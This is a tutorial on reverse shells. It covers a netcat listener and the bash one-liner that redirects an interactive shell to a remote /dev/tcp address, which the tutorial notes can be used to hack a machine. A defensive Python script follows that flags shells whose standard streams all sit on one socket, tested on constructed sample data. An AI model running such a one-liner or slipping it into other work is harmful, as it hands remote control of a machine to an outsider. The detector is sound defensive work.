Hello everyone! In this tutorial I'm going to show you how to make a reverse shell. You will need two machines; I'm using two Linux-based systems.
First, what is a reverse shell?
Usually, when you make a TCP/IP connection between two computers, one side is a server accepting the connection and the other is a client initiating it.
When you connect to your machine using SSH (for example), you (CLIENT) are controlling the remote machine (SERVER). A reverse shell turns this around: the SERVER ends up controlling the CLIENT.
Now you may wonder what the point of doing this is. It can actually be very useful. Right now I see two main reasons:
- You want to help a friend. He doesn't have a server set up with port forwarding and so on, so you can't connect to his machine. Reverse shell: he connects to your computer, and you control his.
- Not as ethical as the first reason, but it still works! You're an evil guy, you want to hack a machine, you can use a reverse shell.
Let's do it!
We are going to use netcat on the server side. Netcat is a networking utility for reading from and writing to TCP and UDP sockets.
First, we are going to listen for incoming connections using netcat:
```bash
# syntax is: nc -l -vv -p <PORT>
# -l : listen (server mode)
# -vv : very verbose mode (print what nc is doing, including who connects)
# -p : the port to listen on. Unless you and the client are on the same network, you have to set up port forwarding to your machine
# note: some netcat flavours (e.g. OpenBSD nc) take the port without -p: nc -l -vv <PORT>
# in my case, this is the command:
nc -l -vv -p 1111
```
Once the command has started, you should see something like this:
Now go to the client. We are going to redirect the standard input, output and error of the client's bash to the server. This is how we do it:
```bash
# syntax is: bash -i &> /dev/tcp/<IP>/<PORT> 0>&1
# bash -i : interactive bash
# &> /dev/tcp/<IP>/<PORT> : redirects the standard output (1) and standard error (2) of bash to the server
#   (bash opens a TCP connection itself when you redirect to the special /dev/tcp path)
# 0>&1 : duplicates the socket on fd 1 onto the standard input (0), so bash also reads its commands from the server
# <IP> and <PORT> are the IP of the server and the port on which you started it
# for me it would be:
bash -i &> /dev/tcp/192.168.0.5/1111 0>&1
# if the server runs on the same machine, you could also use localhost
```
Note: I'm using a local IP because I'm using two computers on the same network, but a hostname works too, e.g. /dev/tcp/aflak.me/1111.
If you want to know more about the redirection operators, this is a good link: Bash Redirections.
Here is the result:
This is it! I have access to the client's bash!
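The trick above leaves a bash process whose file descriptors 0, 1 and 2 all point at the same TCP socket instead of a terminal, which is exactly what a defender can look for on a host. The following Python script is an added example, not part of the original tutorial: it checks a process's fd table for that pattern, runs the check over constructed sample data, and can walk a live /proc (assumed to be Linux, where readlink on /proc/PID/fd/N returns "socket:[INODE]" for a socket).

```python
#!/usr/bin/env python3
"""Flag shells whose stdin/stdout/stderr are all bound to one TCP socket.

`bash -i &> /dev/tcp/IP/PORT 0>&1` produces fds 0, 1 and 2 that resolve to
the same socket inode, something a legitimate interactive shell (pty-backed)
or a cron job (pipe-backed) does not do.
"""
import os
import re

SOCKET_RE = re.compile(r"^socket:\[\d+\]$")
# Shells that would normally have a tty or pipe on fds 0-2.
SHELLS = {"bash", "sh", "dash", "zsh", "ksh"}


def is_suspicious(comm, fd_targets):
    """comm: process name; fd_targets: {fd: readlink() result}.

    True only when a shell has fds 0, 1 and 2 on the *same* socket."""
    if comm not in SHELLS:
        return False
    targets = [fd_targets.get(fd) for fd in (0, 1, 2)]
    if not all(t and SOCKET_RE.match(t) for t in targets):
        return False
    return len(set(targets)) == 1  # same socket inode for in/out/err


def scan_proc(proc="/proc"):
    """Walk a live Linux /proc; return [(pid, comm)] for suspicious shells."""
    hits = []
    if not os.path.isdir(proc):
        return hits  # not Linux (or /proc not mounted): nothing to inspect
    for pid in filter(str.isdigit, os.listdir(proc)):
        try:
            with open(f"{proc}/{pid}/comm") as f:
                comm = f.read().strip()
            fd_dir = f"{proc}/{pid}/fd"
            fds = {int(n): os.readlink(f"{fd_dir}/{n}") for n in os.listdir(fd_dir)}
        except (OSError, ValueError):
            continue  # process exited, or we lack permission to read its fds
        if is_suspicious(comm, fds):
            hits.append((int(pid), comm))
    return hits


# Constructed sample data (not a real capture) in the readlink output format.
SAMPLE = {
    1234: ("bash", {0: "socket:[45678]", 1: "socket:[45678]", 2: "socket:[45678]"}),
    1235: ("bash", {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}),
    1236: ("nginx", {0: "socket:[9]", 1: "socket:[9]", 2: "socket:[9]"}),
}

if __name__ == "__main__":
    for pid, (comm, fds) in SAMPLE.items():
        print(pid, comm, "SUSPICIOUS" if is_suspicious(comm, fds) else "ok")
    print("live /proc hits:", scan_proc())
```

Only the sample bash process with all three fds on socket 45678 is flagged; the pty-backed shell and the non-shell daemon are not. Run it as root (or via a cron job) to inspect every process rather than just your own.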
I hope you liked the tutorial. Leave some comments!